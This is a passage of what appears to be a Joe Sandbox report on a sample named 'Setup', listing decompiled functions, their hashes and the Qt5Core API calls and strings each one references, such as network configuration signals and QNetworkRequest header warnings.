                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?size@$?begin@$?end@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 943683178-0
                                                                                                                                                              • Opcode ID: bf87ce386bcb7862bbf0fafb5d936da23a7005c1a533e5f536341d85c5606809
                                                                                                                                                              • Instruction ID: 0eeb1fddab3be8ce8561cabc4347b189fa8709ad1760da6cebd26db05f32efcf
                                                                                                                                                              • Opcode Fuzzy Hash: bf87ce386bcb7862bbf0fafb5d936da23a7005c1a533e5f536341d85c5606809
                                                                                                                                                              • Instruction Fuzzy Hash: 8DE15CB2A0A642C2DF91DF35D64427863A6EF59B94F488033CE5E476A5FF2DE845CB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$String@@$?data@Char@@Random$?_fill?cend@?from?global@?resize@?size@Base64@Data@DateDevice@@Generator64@@Generator@@Initialization@ObjectPrivate@@Qt@@@Range@Time@@V0@$$V0@@malloc
                                                                                                                                                              • String ID: boundary_.oOo._
                                                                                                                                                              • API String ID: 905285516-2978925420
                                                                                                                                                              • Opcode ID: 02d8ad101beaffff43c98f894d3bdcfe5a44328406f69fc441747eba4475c547
                                                                                                                                                              • Instruction ID: b49c4036c436fed30c1f2bcc4c742f74a46fa2412f5c4bc5313e2d015e4aa4d6
                                                                                                                                                              • Opcode Fuzzy Hash: 02d8ad101beaffff43c98f894d3bdcfe5a44328406f69fc441747eba4475c547
                                                                                                                                                              • Instruction Fuzzy Hash: 0A51B2B260EB4686DB919F31F8540A977A1FB88BA4B404136DE6E07768EF3CD549CF40
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$String@@$V0@@$?size@$?index?mid@?trimmed@$?at@DateTime@@V0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2136887296-0
                                                                                                                                                              • Opcode ID: 76539a83a88a1823223943e502d448cded87a93951f83dc45b57c0b48b5f1279
                                                                                                                                                              • Instruction ID: 127dbb6f378fbc3243eec9c6827ee5dc5345498214e39a30f9ff2a9481c5571a
                                                                                                                                                              • Opcode Fuzzy Hash: 76539a83a88a1823223943e502d448cded87a93951f83dc45b57c0b48b5f1279
                                                                                                                                                              • Instruction Fuzzy Hash: 7E416DA2B1DA4392EB91CF36E8444796761FB88B94F445032DE5E47A28EF3CD50ACF00
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$??8@String@@0@$Data@@HashHash@@$Node@$?allocate?check?free?has?willArray@@ByteCountData@ExternalGrow@ObjectObject@@@Pointer@@SharedShared@Shrunk@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4176548242-0
                                                                                                                                                              • Opcode ID: 136f8c0ea6963a9cc93d0b6686e66454ff579d3b6d42251ff75841b5ab9a933f
                                                                                                                                                              • Instruction ID: 414f97c6b6740ed1b209843fafac3af232b9cb0ed2339f191c73b291d15743b4
                                                                                                                                                              • Opcode Fuzzy Hash: 136f8c0ea6963a9cc93d0b6686e66454ff579d3b6d42251ff75841b5ab9a933f
                                                                                                                                                              • Instruction Fuzzy Hash: D5F1B0B2B1AA9686EBD5DF25D4406BD27A5FF44B88F854036CE0E13395DF38E846CB10
                                                                                                                                                              APIs
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Char@@Ref@@String$?childChildEvent@Event@@@Object@@$?size@Url@@$?const?data@?host@?parseAddressComponentEnd@Flags@FormattingOption@Url@@@@@Utils@@V0@@$?index?mid@CaseChar@@1@Char@@@Ip4@Ip6@Latin1Qt@@@Sensitivity@String@@@V2@1@Valid@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4013561373-0
                                                                                                                                                              • Opcode ID: bfd4af2f7c933841985476364c77f30e290b478f4efdff319069d4f4ec53fd11
                                                                                                                                                              • Instruction ID: 125c71a445fa67b251148a16fc70a96a3817edded5d761abaa30d890919a812b
                                                                                                                                                              • Opcode Fuzzy Hash: bfd4af2f7c933841985476364c77f30e290b478f4efdff319069d4f4ec53fd11
                                                                                                                                                              • Instruction Fuzzy Hash: 86818EA2A0E94291EB929F35E4402BD6765FF84B98F444032DE4E476B5EF3CE54ACF40
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QObject@@QEAA@PEAV0@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF4BD
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA19DF4D2,?,?,?,?,?,00007FFBA19733DE,?,?,00000000), ref: 00007FFBA19DFA44
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?currentThread@QThread@@SAPEAV1@XZ.QT5CORE ref: 00007FFBA19DFA73
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?mainThread@QCoreApplicationPrivate@@SAPEAVQThread@@XZ.QT5CORE ref: 00007FFBA19DFA7C
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?qAddPreRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA8E
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ?qAddPostRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA9B
                                                                                                                                                                • Part of subcall function 00007FFBA19DF9E0: ??1QMutexLocker@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFB33
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF500
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF50B
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF52C
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF537
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF558
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF563
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF584
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF58F
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF5B7
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE(?,?,?,?,?,00007FFBA19733DE,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19DF5C2
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ?lock@QMutex@@QEAAXXZ.QT5CORE ref: 00007FFBA19E3711
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E372D
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E3744
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E375B
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E3771
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E3787
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E379D
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E37B3
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E37C9
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E37E2
                                                                                                                                                                • Part of subcall function 00007FFBA19E36F0: ??0QGenericReturnArgument@@QEAA@PEBDPEAX@Z.QT5CORE ref: 00007FFBA19E37FB
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Argument@@Connection@GenericMetaReturn$?connect@ConnectionQt@@@Type@$?lock@Mutex@@Routine@@Thread@Thread@@$?current?mainApplicationCoreLocker@@MutexPostPrivate@@V0@@
                                                                                                                                                              • String ID: 2configurationAdded(QNetworkConfiguration)$2configurationChanged(QNetworkConfiguration)$2configurationRemoved(QNetworkConfiguration)$2configurationUpdateComplete()$2onlineStateChanged(bool)$2updateCompleted()
                                                                                                                                                              • API String ID: 3599274470-3342877338
                                                                                                                                                              • Opcode ID: 1378942ae3c7f917c0a6b57e8ab0addd66fa07bfc41b0590342ab87847e52c3b
                                                                                                                                                              • Instruction ID: 3d8c03b114bf3013427ce8cfcc711af25d291aaac4adda31f7cc69f01ff16171
                                                                                                                                                              • Opcode Fuzzy Hash: 1378942ae3c7f917c0a6b57e8ab0addd66fa07bfc41b0590342ab87847e52c3b
                                                                                                                                                              • Instruction Fuzzy Hash: 8F3112B191DA4691DB518F21F8440A9B770FB89BA4F540133EEAD43668EF3CD649CF40
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980700
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198070E
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198071C
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198072A
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980738
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980746
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980754
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198078E
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980798
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807A2
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807AC
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807B6
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QDateTime@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807C0
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA1980DF9
                                                                                                                                                              • ?path@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFBA1980E15
                                                                                                                                                              • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1980E22
                                                                                                                                                              • ?lastIndexOf@QString@@QEBAHVQChar@@HW4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA1980E3A
                                                                                                                                                              • ?left@QString@@QEBA?AV1@H@Z.QT5CORE ref: 00007FFBA1980E4E
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA1980E59
                                                                                                                                                              • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1980E6A
                                                                                                                                                              • ??4QString@@QEAAAEAV0@VQChar@@@Z.QT5CORE ref: 00007FFBA1980E78
                                                                                                                                                              • ??4QString@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1980E8F
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1980E9A
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1980EA5
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE ref: 00007FFBA1980EB7
                                                                                                                                                              • ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFBA1980ECF
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1980EE7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1980EF2
                                                                                                                                                              • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1980F48
                                                                                                                                                              • ?startsWith@QString@@QEBA_NVQChar@@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA1980F5B
                                                                                                                                                              • ??0QChar@@QEAA@UQLatin1Char@@@Z.QT5CORE ref: 00007FFBA1980F77
                                                                                                                                                              • ?prepend@QString@@QEAAAEAV1@VQChar@@@Z.QT5CORE ref: 00007FFBA1980F84
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$V0@@$Array@@Byte$Char@@Char@@@$Latin1$DateEmpty@Time@@$CaseComponentFlags@FormattingOption@Qt@@@Sensitivity@Url@@Url@@@@@$?host@?last?left@?path@?prepend@?startsBasicIndexTimer@@V0@$$With@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1366310738-0
                                                                                                                                                              APIs
                                                                                                                                                              • ?typeName@QMetaType@@SAPEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA197981E
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979845
                                                                                                                                                              • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979853
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA197986B
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979876
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979885
                                                                                                                                                              • ?endsWith@QByteArray@@QEBA_ND@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979892
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA19798A3
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA19798B0
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19798E8
                                                                                                                                                              • ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA19798FF
                                                                                                                                                              • ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA197991F
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1979930
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197997E
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19799AF
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Meta$?append@$Type@@$ConverterFunction@$?registerInit_thread_footer$?ends?has?reserve@?typeAbstractCriticalEnterFlag@Flags@Name@NormalizedObject@@@Private@@RegisteredSectionString@@TypeType@Type@@@@With@
                                                                                                                                                              • String ID: QList
                                                                                                                                                              • API String ID: 501081111-116365660
                                                                                                                                                              APIs
                                                                                                                                                              • ?typeName@QMetaType@@SAPEBDH@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA197962E
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979655
                                                                                                                                                              • ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979663
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA197967B
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979686
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA1979695
                                                                                                                                                              • ?endsWith@QByteArray@@QEBA_ND@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19796A2
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19796B3
                                                                                                                                                              • ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,?,00000004,00007FFBA1973180), ref: 00007FFBA19796C0
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19796F8
                                                                                                                                                              • ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA197970F
                                                                                                                                                              • ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA197972F
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1979740
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA197978E
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19797BF
                                                                                                                                                                • Part of subcall function 00007FFBA1A56300: EnterCriticalSection.KERNEL32(?,?,?,00007FFBA1A1EA32,?,?,?,00007FFBA1A36395), ref: 00007FFBA1A56310
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Meta$?append@$Type@@$ConverterFunction@$?registerInit_thread_footer$?ends?has?reserve@?typeAbstractCriticalEnterFlag@Flags@Name@NormalizedObject@@@Private@@RegisteredSectionString@@TypeType@Type@@@@With@
                                                                                                                                                              • String ID: QList
                                                                                                                                                              • API String ID: 501081111-116365660
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkRequest::setHeader: QVariant of type %s cannot be used with header %s, xrefs: 00007FFBA19874A1
                                                                                                                                                              • QNetworkRequest::setHeader: invalid header value KnownHeader(%d) received, xrefs: 00007FFBA1987404
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Logger@@MessageString@@$?warning@Array@@ByteEmpty@
                                                                                                                                                              • String ID: QNetworkRequest::setHeader: QVariant of type %s cannot be used with header %s$QNetworkRequest::setHeader: invalid header value KnownHeader(%d) received
                                                                                                                                                              • API String ID: 4137358909-1051798330
                                                                                                                                                              • Opcode ID: 006400767e4164538494ad5b71ec88e218f391bde36a5287107724f4e5fa1932
                                                                                                                                                              • Instruction ID: 2cf2782ae5104473a4b468c27e492b10ee86d91896ce4b4c7713d99a2a2fc7af
                                                                                                                                                              • Opcode Fuzzy Hash: 006400767e4164538494ad5b71ec88e218f391bde36a5287107724f4e5fa1932
                                                                                                                                                              • Instruction Fuzzy Hash: B64171A2B1A61295FB85DF75E8545F82722FF44B9CB804032EE1E07A55EF2CD14ACF00
                                                                                                                                                              APIs
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,00007FFBA19DF4D2,?,?,?,?,?,00007FFBA19733DE,?,?,00000000), ref: 00007FFBA19DFA44
                                                                                                                                                              • ?currentThread@QThread@@SAPEAV1@XZ.QT5CORE ref: 00007FFBA19DFA73
                                                                                                                                                              • ?mainThread@QCoreApplicationPrivate@@SAPEAVQThread@@XZ.QT5CORE ref: 00007FFBA19DFA7C
                                                                                                                                                              • ?qAddPreRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA8E
                                                                                                                                                              • ?qAddPostRoutine@@YAXP6AXXZ@Z.QT5CORE ref: 00007FFBA19DFA9B
                                                                                                                                                              • ??0QObject@@QEAA@PEAV0@@Z.QT5CORE ref: 00007FFBA19DFABD
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DFAF3
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DFAFE
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ??0QDaemonThread@@QEAA@PEAVQObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA19DF4D2), ref: 00007FFBA19E39AF
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFBA19E39DD
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19E39E8
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?mainThread@QCoreApplicationPrivate@@SAPEAVQThread@@XZ.QT5CORE ref: 00007FFBA19E39F2
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?moveToThread@QObject@@QEAAXPEAVQThread@@@Z.QT5CORE ref: 00007FFBA19E39FE
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?moveToThread@QObject@@QEAAXPEAVQThread@@@Z.QT5CORE ref: 00007FFBA19E3A0B
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?start@QThread@@QEAAXW4Priority@1@@Z.QT5CORE ref: 00007FFBA19E3A1A
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?lock@QMutex@@QEAAXXZ.QT5CORE ref: 00007FFBA19E47F4
                                                                                                                                                                • Part of subcall function 00007FFBA19E3990: ?sender@QObject@@IEBAPEAV1@XZ.QT5CORE ref: 00007FFBA19E480F
